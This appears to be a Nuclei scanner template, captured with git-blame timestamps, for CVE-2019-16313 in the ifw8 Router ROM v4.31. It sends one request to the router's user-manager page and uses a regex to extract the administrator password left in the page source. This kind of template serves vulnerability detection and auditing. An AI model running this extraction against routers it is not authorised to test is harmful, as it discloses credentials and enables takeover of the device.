2021-08-14 11:37:50 +00:00
|
|
|
id: CVE-2019-16313
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: ifw8 Router ROM v4.31 allows credential disclosure
|
|
|
|
author: pikpikcu
|
|
|
|
severity: high
|
2021-08-16 10:20:28 +00:00
|
|
|
description: ifw8 Router ROM v4.31 allows credential disclosure by reading the action/usermanager.htm HTML source code.
|
2021-08-19 13:59:12 +00:00
|
|
|
reference:
|
2021-08-16 10:20:28 +00:00
|
|
|
- https://github.com/Mr-xn/Penetration_Testing_POC/blob/master/CVE-2019-16313%20%E8%9C%82%E7%BD%91%E4%BA%92%E8%81%94%E4%BC%81%E4%B8%9A%E7%BA%A7%E8%B7%AF%E7%94%B1%E5%99%A8v4.31%E5%AF%86%E7%A0%81%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md
|
2021-08-14 11:37:50 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-16313
|
2021-08-20 21:14:16 +00:00
|
|
|
tags: cve,cve2019,exposure,router,iot
|
2021-09-10 11:26:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
|
|
cvss-score: 7.50
|
|
|
|
cve-id: CVE-2019-16313
|
|
|
|
cwe-id: CWE-798
|
2021-08-14 11:37:50 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- '{{BaseURL}}/action/usermanager.htm'
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
2021-08-20 21:14:16 +00:00
|
|
|
- type: regex
|
2021-08-14 11:37:50 +00:00
|
|
|
part: body
|
2021-08-20 21:14:16 +00:00
|
|
|
regex:
|
|
|
|
- '<td class="pwd" data="([a-z]+)">\*\*\*\*\*\*<\/td>'
|
2021-08-14 11:37:50 +00:00
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
|
|
|
|
|
|
|
extractors:
|
|
|
|
- type: regex
|
|
|
|
part: body
|
2021-08-16 10:20:28 +00:00
|
|
|
group: 1
|
2021-08-14 11:37:50 +00:00
|
|
|
regex:
|
2021-08-16 10:20:28 +00:00
|
|
|
- '<td class="pwd" data="([a-z]+)">\*\*\*\*\*\*<\/td>'
|